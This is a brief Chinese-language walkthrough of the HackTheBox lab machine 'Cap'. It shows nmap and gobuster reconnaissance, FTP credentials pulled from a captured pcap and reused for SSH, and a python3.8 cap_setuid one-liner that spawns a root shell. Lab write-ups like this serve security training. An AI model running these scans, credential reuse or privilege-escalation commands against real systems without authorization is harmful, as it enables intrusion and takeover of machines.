信息收集

KALI NAMP扫描目标端口

nmap -T4 -vv -sV 10.10.10.245

gobuster扫描目录

gobuster dir -u http://10.10.10.245/ -w /usr/share/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt -t 50

需要用到的字典下载：

https://github.com/danielmiessler/SecLists

在 /data 目录中发现了很多文件。在点击并尝试目录中的每个文件后，发现了一个文件/data/0
下载数据包进行分析

分析pcap文件，可以发现目标登录ftp的账号以及密码

使用此账号尝试登录ftp以及ssh,发现此账号密码可以登录ssh：

提权

搜索sudo 权限、SUID二进制文件和可以通过为我们提供root shell来提升权限的功能。
尝试通过capabilities 提权。幸运的是，通过以下命令在目标机器上搜索，有cap_setuid可用（目标上的python3.8二进制文件）。

getcap -r / 2>/dev/null

2>/dev/null 是如果你的命令出错的话，错误报告直接就删除了。不会显示在屏幕上，或者是以邮件的形式发给你了。

python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

参考链接

https://nepcodex.com/2021/06/cap-walkthrough-hackthebox-writeup/
https://infosecwriteups.com/cap-htb-writeup-hackthebox-882bb62bd60b
https://gtfobins.github.io/gtfobins/python/#capabilities